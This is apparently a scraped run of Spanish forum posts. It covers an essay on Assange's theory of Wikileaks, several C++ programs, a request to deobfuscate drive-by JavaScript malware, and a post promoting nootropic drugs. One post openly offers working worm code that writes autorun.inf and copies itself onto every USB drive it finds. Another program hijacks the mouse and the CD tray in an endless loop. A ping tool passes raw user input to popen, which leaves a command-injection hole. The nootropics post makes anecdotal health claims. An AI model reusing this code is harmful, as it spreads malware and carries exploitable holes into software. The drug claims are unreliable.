El escrito que introduce esta cita es intelectualmente substancial, pero realmente no es difícil de leer, así que podrías echarle un vistazo tú mismo. La mayor parte de los medios de comunicación parecen estar perdiendo la cabeza con Wikileaks sin haberse leído estos ensayos, incluso a pesar de que describe la función y los objetivos de una organización como Wikileaks en términos meridianamente claros. Para resumirlo, comienza describiendo un estado como los EEUU esencialmente como una conspiración autoritaria, y entonces deduce que la estrategia práctica para combatir esa conspiración es degradar su capacidad de conspirar, obstaculizar su capacidad para "pensar" como una mente conspiradora. La metáfora de una red de ordenadores queda en este texto esencialmente implícita, pero es totalmente crucial: busca oponerse al poder del estado tratándolo como como un ordenador y arrojando arena sobre sus diodos.

Comienza proponiendo que la conspiración y el autoritarismo van de la mano, argumentando que dado que el autoritarismo produce la resistencia a sí mismo -generando tal resistencia en la medida en que ese autoritarismo se haga conocido para el público-, sólo puede continuar existiendo y funcionando impidiendo que sus intenciones (¿la autoría de su autoridad?) sean conocidas por el público general. Inevitablemente se convierte, según argumenta Assange, en una conspiración:
Citar
Los regímenes autoritarios dan lugar a que se alcen fuerzas que se oponen a ellos al trabajar contra la voluntad individual y colectiva hacia la libertad, hacia la verdad y la autorealización. Los planes que asisten al dominio autoritario, una vez descubiertos, inducen a la resistencia. Por tanto estos planes son ocultados por los poderes autoritarios exitosos. Esto es suficiente para definir su conducta como conspirativa.

El problema que esto crea para la conspiración gubernamental se convierte entonces en el problema de organización que debe resolver: si la conspiración debe operar en secreto, ¿cómo se puede comunicar, cómo puede planificar y tomar decisiones, disciplinarse y transformarse para afrontar nuevos retos? La respuesta es: controlando el flujo de la información. Después de todo, si la organización tiene unos objetivos susceptibles de ser articulados, el darles esta estructura abiertamente los expone a la resistencia. Pero al mismo tiempo, el no conseguir articular estos objetivos ante sí misma priva a la organización de su capacidad para procesarlos y avanzar para lograrlos. Para las conspiraciones autoritarias el equilibrio apropiado entre autoridad y conspiración se encuentra en algún lugar intermedio.

Su modelo para imaginar la conspiración, entonces, no es en absoluto ese cliché al que se refiere la gente cuando se burlan despectivamente de alguien por ser un "teórico de la conspiración". Después de todo, la mayor parte de las "conspiraciones" con las que estamos familiarizados son puras fantasías, y dado que los "Protocolos de Sión" o el SPECTRE de James Bond nunca han existido, su no existencia se convierte en un garrote con el que golpear a la gente que pueda utilizar el término o el concepto. En cambio, para Assange una conspiración es algo bastante banal, se trata simplemente de cualquier red de asociados que actúan coordinados ocultando su asociación concertada a quienes están fuera de la red, esto es, una autoridad que funciona evitando que sus actividades sean lo bastante visibles como para provocar una reacción en contra. Puede tratarse de algo tan espectacular como una coalición poco rígida de conspiradores trabajando para empezar una guerra con Iraq, o podría tratarse simplemente de los engaños y conspiraciones banales de los procedimientos diplomáticos habituales.

La analogía de un tablón con clavos que están atados con cordeles ilustra apropiadamente este modelo teórico:

En primer lugar toma algunos clavos ("conspiradores") y luego clávalos aleatoriamente a martillazos en un tablón. Entonces utiliza un cordel ("comunicación") y pásalo de clavo a clavo sin romperlo. Llamemos "enlace" al cordel que conecta a dos clavos. El cordel sin romper significa que es posible viajar de un clavo a cualquier otro clavo mediante cordel y clavos intermedios... es decir, estamos hablando de los flujos de información de conspirador a conspirador. No todo conspirador confía o conoce al resto, incluso si todos están conectados. Algunos están en los márgenes exteriores de la conspiración, otros son centrales y se comunican con muchos conspiradores, y otros apenas conocen a un par de conspiradores pero son un puente entre secciones o agrupaciones importantes dentro de la conspiración...

A menudo los conspiradores aplican criterio, pues algunos confían y dependen de los demás mientras que otros dicen poca cosa. Los flujos de información importantes fluyen a menudo a través de determinados enlaces, y a través de otros viaja información trivial. Así que expandimos nuestro sencillo modelo de grafo conectado para incluir no sólo enlaces sino su "importancia".

CitarRegresemos a nuestra analogía de tablón-y-clavos. Imagina un cordel grueso y pesado uniendo algunos de los clavos y un cordel delgado y ligero uniendo otros. Llamemos "peso" a la importancia del enlace en su grosor o delgadez. El "peso" entre conspiradores que nunca se comunican es cero. La "importancia" de la comunicación que pasa a través de un enlace es difícil de evaluar a priori, ya que su verdadero valor depende del resultado de la conspiración. Podríamos decir sencillamente que la "importancia" de la comunicación contribuye al peso de un enlace de la manera más obvia; el peso de un enlace es directamente proporcional a la cantidad de información importante que fluye a través de ella. Las preguntas sobre conspiraciones en general no necesitarían que conociésemos el peso de link alguno, ya que este cambia de una conspiración a otra. [1]

Tal red no estará organizada por un diagrama de flujo, ni producirá nunca un único mapa coherente de sí misma (sin acelerar de ese modo su propio colapso). Probablemente es bastante acéfala por regla general: si tuviera una única cabeza (o una mente única organizadora que pudiera inspeccionar y mapear el conjunto), entonces cada conspirador estaría a un paso del jefe y apenas a dos pasos del resto de los miembros de la conspiración. Es decir, se necesita cierta capacidad de centralización (de otro modo no habría conspiración), pero demasiada centralización vuelve vulnerable al sistema.

Utilizando la serie de televisión Bajo Escucha como ejemplo claro a mano, imagínate que Avon Barksdale se estuviera comunicando directamente con Bodie. Todo lo que tendrías que hacer es conseguir a una persona -cualquier persona- y estarías a un paso del jefe, cuya conexión directa al resto de la gente en la conspiración te permitiría barrerlos a todos de una vez. Obviamente, ninguna conspiración efectiva funcionaría así. Recuerda a String Bell en la serie, "no me jodas tío, ¿estás tomando notas sobre una [nuestra] jodida conspiración criminal?". Para funcionar de manera efectiva, la autoridad primaria debe estar des-asociada del resto de los miembros de la conspiración, y las capas de mediación deben ser todo lo opacas que sea posible para los implicados (cosa que aclara poco un recibo). Pero mientras que la complejidad de estos enlaces protegen a la autoridad dirigente de quedar expuesta, también limitan la capacidad de Avon Barksdale de controlar lo que sucede a su alrededor. ¡Los negocios funcionan con sus propias reglas! Y cuantos más muros construyes a su alrededor, menos puede confiar la autoridad en sus lugartenientes, y menos le necesitarán (o siquiera tolerarán) ellos.

Esto, razona Assange, es una manera de convertir una característica en un bug. Y la perspicacia que subyace es una idea sencilla y, en mi opinión, bastante persuasiva: mientras que una organización estructurada por líneas directas y abiertas de comunicación será mucho más vulnerable a la penetración del exterior, cuanto más opaca se haga de cara a sí misma (como defensa ante la mirada exterior) menos capaz será de "pensar" como un sistema, de comunicarse consigo misma. Cuanto más conspiratoria se vuelva, en cierto sentido, menos efectiva será como conspiración. Cuanto más cerrada está una red a las intrusiones externas, menos capaz será de involucrarse en aquello que está fuera de ella (toda una teorización hacker)

Por supuesto, su pensamiento no es así de abstracto; como anota explícitamente, también entiende el funcionamiento del Estado en EEUU haciendo una analogía con las organizaciones terroristas con éxito. Si has visto por ejemplo "La Batalla de Argel", piensa en cómo el contra-terrorismo francés trabaja para producir un diagrama de flujo de la organización de la resistencia argelina: dado que tienen una superioridad militar abrumadora, su incapacidad para aplastar al FLN residía en su incapacidad para encontrarlo, una incapacidad pretendida estratégicamente por el propio FLN mediante su propia descentralización. Cortarle una pata al pulpo, se dio cuenta el FLN, no degradaría el sistema como un todo siempre que las patas operasen de manera independiente. Los enlaces entre las unidades fueron los puntos vulnerables para el sistema desde una perspectiva global, con lo que eran lo más cuidadosamente protegido por parte de los argelinos, y lo más insistentemente perseguido por los franceses. Y a pesar de que los franceses ganaron la batalla de Argel, perdieron la guerra, porque adoptaron las tácticas que menciona Assange brevemente tan sólo para dejarlas después a un lado:

Citar¿Cómo podemos reducir la capacidad de actuación de una conspiración? ... Podemos partir la conspiración, reducir o eliminar comunicación importante entre algunos enlaces-cordeles que pesen mucho o entre muchos enlaces de poco peso. Los ataques tradicionales a los grupos de poder conspirativo como el asesinato, han cortado enlaces de pesos altos asesinando, secuestrando, chantajeando o de algún otro modo marginando o aislando algunos de los conspiradores a los que estaban conectados.

Esta es la estrategia del antiterrorismo de EEUU -encontrar quién está al cargo y luego ir a por él-, pero no es esto lo que quiere hacer Assange: tal programa aislaría una versión específica de la conspiración e intentaría destruir la forma concreta ya existente de esta, lo cual, argumenta Assange, tendría dos limitaciones importantes.

Por un lado, para el momento en que esa conspiración adopta una forma que pueda servir de diana, su capacidad para funcionar estará bastante avanzada. Como él escribe:

Citar"Un hombre encadenado sabe que debería haber actuado antes, puesto que su capacidad para influir las acciones del Estado se acerca a su fin. Para manejarnos con acciones conspirativas poderosas debemos adelantarnos a la hora de pensar, y atacar el proceso que lleva hasta allá, dado no podemos tratar con las acciones en sí mismas."

En otras palabras, en el momento en que el cáncer haya hecho metástasis, los antioxidantes ya no son efectivos, e incluso es difícil aplicar una quimioterapia violenta. Entonces, es mejor pensar sobre cómo las conspiraciones llegan a existir para impedir que siquiera se formen (del mismo modo que si aislas el carcinógeno lo bastante pronto, no necesitarás quitar el tumor después). Es decir, que la idea es dirigirse al proceso de agregación en sí, obstaculizando el principio de su reproducción: en lugar de intentar exponer y cortar enlaces específicos entre conspiradores (que sirve para poco a la hora de evitar que se formen nuevos enlaces y podría no alterar el funcionamiento del sistema a nivel global), pretende atacar al "poder conspirativo al completo" del sistema averiguando cómo reducir su capacidad total para compartir e intercambiar información, y así conseguir frenar su capacidad de proceso. Como él mismo indica:

CitarLas conspiraciones son artefactos cognitivos. Son capaces de pensar más rápido que el propio grupo de individuos actuando sólos. Las conspiraciones toman información sobre el mundo en que operan (el entorno conspirativo), pasan a través de los conspiradores, y actúan entonces sobre el resultado. Podemos ver las conspiraciones como un tipo de artefacto que tiene flujos de entrada (información sobre el entorno), una red informática (los conspiradores y sus enlaces entre ellos), y flujos de salida (acciones que pretenden cambiar o mantener el entorno).

Dado que piensa sobre la conspiración como una red informática, destaca en un aparte que un método para debilitar su capacidad cognitiva sería degradar la calidad de su información:
Citar
Dado que una conspiración es un tipo de artefacto cognitivo que actúa sobre la información adquirida de su entorno, distorsionar o restringir estos flujos de entrada implicará que los actos que se basen en ellos muy probablemente van a errar el tiro. En programación se llama a este efecto "basura dentro, basura fuera". Habitualmente el efecto va en la otra dirección; son las conspiraciones los agentes del engaño y la restricción de la información. En EEUU, este aforismo del programador a menudo se llama "el Efecto Fox News".

No estoy seguro de que sea esto lo que quiere decir, pero merece la pena reflexionar que la capacidad de la conspiración para engañar a otros mediante la propaganda también puede funcionar como la tendencia de la conspiración para engañarse a sí misma sobre su propia propaganda. Mucha gente cae en la trampa genuinamente después de todo. ¿Habrían caído tanto en la trampa del talibán impostor nuestros super-espías en Afganistán si no hubieran creido en esencia su propia línea de propaganda, si no se hubieran convencido a sí mismos -incluso de manera provisional- de que de hecho estamos ganando la guerra contra los Talibán? Lo mismo es cierto sobre las armas de destrucción masiva; aunque nadie que poseyera los hechos podría concluir racionalmente que Saddam Hussein como Irán ahora tuvieran o estuvieran persiguiendo tener tales armas, esto no significa que la gente que habla sobre bombas de relojería con este tema no se lo crea. A veces esto trabaja a su favor, pero a veces no: si Obama pensara que Afganistán se puede ganar, podría hundir su presidencia, por ejemplo, mientras que la creencia de sus asesores de que la economía se recuperaría si el gobierno rescatara sólo a los bancos casi con toda certeza hizo perder las elecciones a mediados de la legislatura para el Partido Demócrata (y fue un golpe mortal para muchos de quienes estaban implementando esa política en particular). Que esto haga daño a una conspiración en particular no está claro; puede que los impulsores de esa política hayan perdido sus cargos, pero la mayor parte de ellos se retirarán del servicio público pasando a cómodos trabajos en los sectores que ellos apoyaron mientras formaban parte del estado. Y muchos políticos de éxito no hacen otra cosa que fallar.

Sin embargo, no es en esta dirección que se dirige el razonamiento de Assange. En vez de esto, decide que la manera más efectiva de atacar este tipo de organización sería convertir las "filtraciones" en una parte fundamental del entorno de información de la conspiración. Por esto es por lo que lo importante no es que unas filtraciones en particular vayan a ser específicamente efectivas. Wikileaks no filtra algo como el video de "Asesinato Colateral" como mecanismo para poner fin a esa táctica militar en particular; eso sería tomar como objetivo una pata específica de la hidra mientras que al monstruo le crecen otras dos patas. En vez de eso, la idea es que aumentar la porosidad del sistema de información de la conspiración dificultará su funcionamiento, que la conspiración se volverá contra sí misma en su auto-defensa, tomando medidas drásticas sobre sus propios flujos de información de maneras que impidan sus propias funciones cognitivas. En otras palabras, destruyes la conspiración haciéndola tan paranoica de sí misma que ya no pueda conspirar:

CitarCuanto más secretista o injusta es una organización, mayor miedo y paranoia inducen en su liderazgo y su círculo de planificación las filtraciones. Esto debe resultar en una minimización de la eficiencia de los mecanismos de comunicación interna (un aumento en el "impuesto de secretismo" cognitivo) y en el consiguiente declinar cognitivo a lo largo del sistema que desemboca en una menor capacidad para mantenerse en el poder, dado que el entorno requiere que se adapte a él. Por tanto, en un mundo en el que la filtración es fácil, los sistemas secretistas o injustos son golpeados no-linealmente mediante sistemas justos y abiertos. Dado que los sistemas injustos debido a su propia naturaleza inducen a que emergan sus opositores, y en muchos lugares apenas disfrutan de una posición superior, las filtraciones masivas les dejan exquisitamente vulnerables ante aquellos que buscan sustituirlos con formas más abiertas de gobierno.   

En otras palabras, la filtración es tan sólo el catalizador para la contra-reacción deseada; Wikileaks quiere provocar a la conspiración para que apague su propio cerebro en respuesta a la amenaza. Mientras intenta cubrir sus propios agujeros y encontrar a los filtradores, razona Assange, los elementos que la componen se des-sincronizarán y se volverán unos contra otros, se des-enlazarán de la red de procesamiento central, y se desharán. Incluso si todos los elementos de la conspiración todavía existen, el hecho de privarles de un flujo vigoroso de información que los conecta juntos como una conspiración evita que actúen como una conspiración. Tal como lo plantea:

CitarSi el poder conspirativo total es cero, entonces claramente no hay flujo de información entre los conspiradores y por lo tanto no hay conspiración. Un aumento o descenso substanciales en el poder total conspirativo casi siempre significa lo que esperamos que signifique; un aumento o disminución en la capacidad de la conspiración para pensar, actuar y adaptarse... una conspiración autoritaria que no puede pensar carece del poder para preservarse a sí misma contra los opositores que genera.

En este sentido, casi todos los comentarios de los medios sobre la última ronda de filtraciones ha errado totalmente el tiro. Después de todo, ¿por qué se están filtrando cables diplomáticos? Estas filtraciones no tratan específicamente sobre las guerras en absoluto, y muchos parecen ser sencillamente una ámplia franja de los secretos del día a día que un estado oculta a todo el mundo excepto a los centenares de miles de gente en quienes más confía, que tienen los permisos apropiados para acceder a ellos. La cuestión es: Assange tiene toda la razón al afirmar que nuestro gobierno tiene funciones conspirativas. ¿De qué otro modo podría llamarse al hecho de que un pequeño porcentaje de nuestra clase dirigente gobierne y actúe en nuestro nombre de acuerdo con información que comparte libremente a nivel interno pero que no puede ser compartida entre sus electores?. Y todos nosotros probablemente sabemos que este ha sido más o menos el caso; cualquiera que se haya sorprendido porque lo que nuestras embajadas están haciendo sea trabajo político sucio, secreto e insincero, es por norma general un ingenuo. Pero Assange no pretende producir un escándalo periodístico que provoque reformas gubernamentales sonrojadas o alguna cosa por el estilo, precisamente porque a nadie le escandalizan ya estas cosas. En vez de eso, lo que está intentando es estrangular los enlaces que hacen posible la conspiración, para exponer la necesaria porosidad de la red conspirativa del estado norteamericano con la esperanza de que tal estado intente entonces encoger su metafórica red informática en respuesta, haciéndose por tanto más estúpida y lenta y pequeña.

Las primeras respuestas parecen indicar que Wikileaks va en el buen camino si quiere llevar a cabo algunos de esos objetivos. Como afirma Simon Jenkins (en un gran texto por derecho propio), "las filtraciones han abierto un agujero en el armazón por el que los estados guardan sus secretos". Y si los diplomáticos citados por Le Monde tienen razón en cuanto que "nunca volveremos a ser capaces de practicar la democracia como antes", esto es exáctamente lo que WIkileaks estaba intentando conseguir. Es un tanto patético escuchar a los diplomáticos y sus cómplices en el gobierno lamentar que el trabajo normal de la "diplomacia" será ahora imposible. Es como escuchar a alguien quejarse porque el tipo que tiene al lado que juega tan bien al baloncesto le está impidiendo coger los rebotes. Pobrecitos. Si Assange tiene razón al destacar que su organización ha conseguido un mayor escrutinio estatal que el resto del aparato periodístico combinado, tiene razón, pero también está desviando el tema: si bien Wikileaks hace algunas cosas que hacen los periodistas, también hace otras muy distintas. Assange, como indican muy claramente sus afirmaciones introductorias, tiene como objetivo "alterar radicalmente la conducta de los regímenes".

Si Wikileaks es un tipo distinto de organización que cualquier otra cosa que hayamos visto antes, es interesante verle alinearse con un progresismo más convencional. Assange no está muy desencaminado después de todo cuando cita las palabras de Theodore Roosevelt en su plataforma progresista presidencial de 1912 como epígrafe al primer ensayo; Roosevelt se dio cuenta hace cien años que "Detrás del gobierno aparente se asienta entronizado un gobierno invisible que no debe lealtad ni reconoce responsabilidad alguna a la gente", y también era cierto entonces que "La primera tarea del arte de gobernar es destruir este gobierno invisible, contaminar esta alianza terrible entre los negocios corruptos y los políticos corruptos". Assange está intentando cagar sobre toda esta alianza terrible con métodos que el Roosevelt tardío y más radical habría elogiado.

Merece la pena acabar entonces recordando que Roosevelt acuñó el término "remueve-estiercol" [Muckracker en inglés], y que lo hizo como un término despreciativo. Sobre la novela de Bunyan "El Progreso del Peregrino", Roosevelt citaba el ejemplo del "remueve-estiercol" que sólo podía mirar hacia abajo, cuya perspectiva estaba totalmente limitada al "estiercol" que debía remover en su trabajo, y que había perdido la capacidad de ver nada superior. Merece la pena citar aquí al propio Roosevelt:

CitarEn el Progreso del Peregrino de Bunyan quizá recordeis la descripción del hombre remueve-estiercol, el hombre que no podía mirar en otra dirección que hacia abajo, con sus herramientas en la mano; a quien se le ofreción una corona celestial por su remover del estiercol, pero que no podía mirar hacia arriba ni tomar en consideración la corona celestial que se le ofrecía, sino que seguía removiendo hacia sí la mugre del suelo... el Hombre con el removedor de estiercol es propuesto como ejemplo de aquellos cuya visión está fijada en lo carnal en lugar de en las cosas espirituales. Sin embargo, también tipifica al hombre que en esta vida se niega consistentemente a ver nada noble y elevado, y fija sus ojos con solemnidad sólo en aquello que es vil y degradante. Ahora bien, es muy necesario que no nos acobardemos a la hora de ver lo que es vil y degradante. Hay mugre en el suelo, y debe ser fregada con el removedor de estiercol; y hay ocasiones y lugares en las que este servicio es el más necesario de todos los que se pueden llevar a cabo. Pero el hombre que nunca hace otra cosa, quien nunca piensa o habla o escribe excepto sobre sus logros con el remueve-estiercol, se convierte rapidamente no en una ayuda a la sociedad, no en una incitación al bien, sino en una de las más poderosas fuerzas para el mal. Hay muchos y graves males en el cuerpo político, económico y social, y hay una necesidad urgente de hacerles la guerra más severa. Debería haber una implacable puesta al descubierto y ataque hacia todo hombre malvado, ya sea político u hombre de negocios, hacia toda práctica malvada, ya sea en política, en los negocios, o en la vida social. Alabo como a un benefactor a todo escritor u orador, a todo hombre que sobre un estrado, en un libro, en una revista o en un periódico, haga tal ataque con severidad y sin piedad alguna, siempre que al mismo tiempo y en todo momento recuerde que el ataque sólo es útil si es totalmente honesto y veraz...

Roosevelt pudo ser muchas cosas cuando profirió aquellas palabras, pero no estaba errado. Hay cierta amoralidad despiadada en la filosofía de Mark Zuckerberg[2] de que toda transparencia es una cosa buena siempre y en todas partes, particularmente cuando es proferida por el tipo que está bien ocupado forrándose con tu radical transparencia. Y la manera en la que la mayor parte de los periodistas "destapan" los secretos como práctica profesional -con los límites que se ponen al hacerlo- está afectado por el mismo egoísmo limitante: porque publicitan lo privado sólo cuando existe un beneficio al hacerlo, con lo que tienen los ojos fijos en el valor del estiercol que están removiendo, y aprenden a comprometer su futura existencia profesional sobre un flujo firme y contínuo de estiercol. En el estiercol confían.

De acuerdo con su ensayo, Julian Assange está intentando hacer otra cosa. Dado que todos sabemos a grandes rasgos que el Estado en EEUU -como todos los estados- está en esenciahaciendo un montón de cosas básicamente sombrías durante más o menos todo el tiempo, el mero hecho de revelar las maneras específicas en las que están haciendo estas cosas sombrías no es de por sí una cosa necesariamente buena. En algunos casos podría ser malo, y en muchos casos el bien provisional que pueda hacer tendrá un rango de acción limitado. La cuestión que debe plantearse un ser humano ético -y Assange siempre enfatiza su ética- debe ser la cuestión sobre qué conseguirá poniendo los secretos al descubierto, qué bien hará, qué mejor estado de las cosas traerá. Y estés de acuerdo o no con su argumentación, Assange tiene una visión claramente articulada sobre cómo las actividades de Wikileaks "nos llevarán a través del lodazal del lenguaje políticamente distorsionado, hasta llegar a una posición de claridad", una estrategia que señala que al poner al descubierto los secretos se impedirá en último término la producción de futuros secretos. Así, el sentido de Wikileaks -así lo argumenta Assange- es sencillamente hacer que Wikileaks se vuelva innecesario.



[1] N.del T. : Esta idea sobre los clavos y el cordel está tomada de los modelos matemáticos de la "Teoría de Grafos": http://es.wikipedia.org/wiki/Teor%C3%ADa_de_grafos

[2] N, del T. : Mark Zuckerberg es el creador y CEO de Facebook.



("El Gran Hermano está vigilando...
Nosotros también")

fuente: http://www.13t.org/decondicionamiento/forum/viewtopic.php?p=15888
#83
Programación C/C++ / broma en c++
3 Julio 2013, 16:09 PM
aca un pequeño programa que hice abre el cdrom cambia la posicion del mouse y pone una canción:


#include <windows.h>
#include <mmsystem.h>
#include <iostream>


int main(int argc, char *argv[])
{
   int x;
   int y;
   mciSendString("play na.wav",0,0,0);
   MessageBox(0,"su computador esta poseido att:el diablo","error de posesion",MB_HELP);
   while(true)
   {
   x=(rand() % 1000);
   y=(rand() % 800);
   SetCursorPos(x,y);
   mciSendString("set Cdaudio door open",0,0,0);
   Sleep(4000);
   mciSendString("set Cdaudio door close",0,0,0);
   }
   return EXIT_SUCCESS;
}


edito: en Dev-C++ tienen que ir a: opciones del compilador>añadir estos comandos a la linea de comandos del linker. Deben seleccionar la casilla que te aparece y colocar dentro del campo de texto esto: -lwinmm, en el caso de otros compiladores debes linkear la libreria de otra forma

#pragma comment ( lib, "winmm.lib" )
#84
talves a alguien le sirva


#include <iostream>
#include <windows.h>
#include <fstream>



using namespace std;

int main(int argc,char *argv[])
{
    while(true){
    UINT test;
    char tok[][5]={"C:","D:","E:","F:","G:","H:"}; //obviamente se pueeden poner mas  aunque no es muy comun que pase de H://
    for (int l=0;l<=4;l++){
    test = GetDriveType(tok[l]); // MIRA QUE TIPO DE DISPOSITIVO ES EN CASO DE SER 2 ENTONCES ES UNA USB SI ES 1 NO EXISTE
    if(test==2){
    SetCurrentDirectory(tok[l]); // SE UBICA EN EL DIRECOTORIO RAIZ DE LA USB
    ifstream programa;
    programa.open("programa.exe");
    if(!programa.is_open()){ // EN CASO DE NO ESTAR INFECTADA LO HACE
    cout << "usb infectada" << endl;
    ofstream autorun;
    autorun.open("autorun.inf"); //FAMOSO AUTORUN
    autorun << "[Autorun]" << endl;
    autorun << "Open=programa.exe" << endl;
    autorun << "Label=USB INFECTADA"<< endl;
    autorun << "UseAutoplay=1"<< endl;
    autorun << "action=Abrir USB"<< endl;
    autorun << "action=@programa.exe"<< endl;
    autorun << "shell\\open=Abrir"<< endl;
    autorun << "shell\\open\\Command=programa.exe" << endl;
    autorun << "shell\\open\\Default=1" << endl;
    autorun << "shell\\explore=Explorar"<< endl;
    autorun << "shell\\explore\\Command=programa.exe"<< endl;
    autorun.close();
    CopyFile( argv[0], "programa.exe", true ); // SE COPIA
    }
    }
    }
    Sleep(5000); // ESPERA 5 SEGUNDOS
    }
    return 0;
}

#85


Código (c++) [Seleccionar]
#include <windows.h>
#include <cstdio>
#include <cstring>
#include <iostream>

int MN_MENSAJE=1024;
int MN_SALIR=1025;
HINSTANCE miinstance;
/*  Declare Windows procedure  */
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);

/*  Make the class name into a global variable  */
char szClassName[ ] = "CodeBlocksWindowsApp";

int WINAPI WinMain (HINSTANCE hThisInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR lpszArgument,
                     int nCmdShow)
{
    HWND hwnd;               /* This is the handle for our window */
    MSG messages;            /* Here messages to the application are saved */
    WNDCLASSEX wincl;        /* Data structure for the windowclass */
    miinstance=hThisInstance;

    /* The Window structure */
    wincl.hInstance = hThisInstance;
    wincl.lpszClassName = szClassName;
    wincl.lpfnWndProc = WindowProcedure;      /* This function is called by windows */
    wincl.style = CS_DBLCLKS;                 /* Catch double-clicks */
    wincl.cbSize = sizeof (WNDCLASSEX);

    /* Use default icon and mouse-pointer */
    wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
    wincl.lpszMenuName = NULL;                 /* No menu */
    wincl.cbClsExtra = 0;                      /* No extra bytes after the window class */
    wincl.cbWndExtra = 0;                      /* structure or the window instance */
    /* Use Windows's default colour as the background of the window */
    wincl.hbrBackground = (HBRUSH)CreateSolidBrush(RGB(239,239,239));

    /* Register the window class, and if it fails quit the program */
    if (!RegisterClassEx (&wincl))
        return 0;

    /* The class is registered, let's create the program*/
    hwnd = CreateWindowEx (
           0,                   /* Extended possibilites for variation */
           szClassName,         /* Classname */
           "Ping",       /* Title Text */
           WS_OVERLAPPEDWINDOW, /* default window */
           CW_USEDEFAULT,       /* Windows decides the position */
           CW_USEDEFAULT,       /* where the window ends up on the screen */
           544,                 /* The programs width */
           275,                 /* and height in pixels */
           HWND_DESKTOP,        /* The window is a child-window to desktop */
           NULL,                /* No menu */
           hThisInstance,       /* Program Instance handler */
           NULL                 /* No Window Creation data */
           );


    /* Make the window visible on the screen */
    ShowWindow (hwnd, nCmdShow);

    /* Run the message loop. It will run until GetMessage() returns 0 */
    while (GetMessage (&messages, NULL, 0, 0))
    {
        /* Translate virtual-key messages into character messages */
        TranslateMessage(&messages);
        /* Send message to WindowProcedure */
        DispatchMessage(&messages);
    }

    /* The program return-value is 0 - The value that PostQuitMessage() gave */
    return messages.wParam;
}


/*  This function is called by the Windows function DispatchMessage()  */

LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    const int MN_MENSAJE=1025;
    HMENU menu=CreateMenu();
    HMENU submenu=CreateMenu();
    switch (message)                  /* handle the messages */
    {
        case WM_CREATE:
            AppendMenu(submenu,MF_STRING,MN_MENSAJE,"&creditos");
            AppendMenu(menu,MF_STRING|MF_POPUP,(UINT)submenu,"&Acerca de");
            SetMenu(hwnd,menu);
            static HFONT hFont = CreateFont(14, 0, 0, 0, 100, 0, 0, 0,0, 0, 0, 0, VARIABLE_PITCH | FF_SWISS, "Helv");
            static HWND texto = CreateWindowEx(0,"STATIC", "Inserte la ip:", WS_CHILD|WS_VISIBLE, 0, 0, 90, 25, hwnd, 0, miinstance, NULL);
            static HWND campo = CreateWindowEx(0,"EDIT", "", WS_CHILD|WS_VISIBLE, 0, 45, 105, 12, hwnd, 0, miinstance, NULL);
            static HWND boton = CreateWindowEx(NULL,"BUTTON","hacer ping",WS_CHILD|WS_VISIBLE|WS_TABSTOP,110,42,100,20,hwnd,0,miinstance,NULL);
            static HWND text2 = CreateWindowEx(0,"STATIC", "Salida del comando:", WS_CHILD|WS_VISIBLE, 250, 0, 130, 25, hwnd, 0, miinstance, NULL);
            static HWND text3 = CreateWindowEx(0,"STATIC", " ", WS_CHILD|WS_VISIBLE, 250, 30, 230, 225, hwnd, 0, miinstance, NULL);
            SendMessage(texto,WM_SETFONT,(WPARAM)hFont,true);
            SendMessage(boton,WM_SETFONT,(WPARAM)hFont,true);
            SendMessage(campo, WM_SETFONT, (WPARAM) hFont, true);
            SendMessage(text2, WM_SETFONT, (WPARAM) hFont, true);
            SendMessage(text3, WM_SETFONT, (WPARAM) hFont, true);
            break;
        case WM_COMMAND:
         switch(LOWORD(wParam))
            {
                case MN_MENSAJE:
                MessageBox(hwnd,"codeado por daryo","creditos",MB_OK);
                break;
            }
         if((HWND)lParam==boton)
         {
            FILE *in;
            char ip[100];
            char ping[200]="ping ";
            char n[700];
            char string[700]=" ";
            GetWindowText(campo, ip, 255);
            strcat(ping,ip);
            in=popen(ping,"r");
            while ( fgets(n, 700, in) != NULL )
            {
              strcat(string,n);
            }
             SendMessage(text3, WM_SETTEXT, false, (long int) string);

         }
            break;
        case WM_DESTROY:
            PostQuitMessage (0);       /* send a WM_QUIT to the message queue */
            break;
        default:                      /* for messages that we don't deal with */
            return DefWindowProc (hwnd, message, wParam, lParam);
    }

    return 0;
}
#86
Nivel Web / malware ofuscado javascript
1 Julio 2013, 22:02 PM
encontre un java drive by en una pagina que desaparece y aparece a ciertas horas el codigo del iframe donde trae el malware es este:
alguien me puede ayudar desofuscando el codigo gracias :)
http://pastebin.com/Ybj9iix1

PD:  es mala idea ponerlo como html y abrirlo si tienes java en el navegador
#87
Drogas nootrópicas: ¡Dispara tu intelecto!
Citar

(De http://www.burningecstasy.com/2012/11/transhumanismo-y-drogas-nootropicas.html )

Quizá no estén al tanto, pero hay también un "gym" para el cerebro. Existen sustancias para el ejercitar la mente que son totalmente legales y probadas clínicamente Reciben el nombre de "drogas nootrópicas". En verano estuve un mes y medio probando con tres de estas y debo decir que funcionan, de hecho retomaré su consumo en breve. Combinadas incluso con café (cafeína) los resultados son sorprendentes, pudiendo estudiar durante largas horas sin ningún tipo de fatiga. Mi creatividad se disparó, nunca había escrito poesía con tanta facilidad e inspiración como en el transcurso de ese mes y medio. Las asociaciones parecen funcionar mejor y las "respuestas" llegan como un flash. Mis profesores estuvieron sorprendidos con mi velocidad de aprendizaje y concentración, luego les conté acerca de mis nuevos aliados.

Puedes hacer todo esto tú también.

Voy a presentar el siguiente régimen de nootrópicos, tanto los que tomé, como las que voy a tomar para complementar las diferentes funciones entre estas. Desarrollo esto más abajo, mantente leyendo.


Lo primero es esbozar su funcionamiento. Los efectos de estos suplementos son sinergísticos, es decir, cada uno de ellos tiene diferentes mecanismos y funciones; diferentes acciones interrelacionadas. Si tomásemos nootrópicos de manera aleatoria no nos darán el efecto sinergístico mencionado y los efectos serán prácticamente nulos. Así que por ejemplo: tenemos la acetilcolina que es el neurotransmisor primario relacionado con el procesamiento de información. Hay multitud de suplementos que incrementan la producción de acetilcolina, entre ellos la CDPColina, alfaGPC, DMAE, centropenoxina y Acetil L Carnitina.


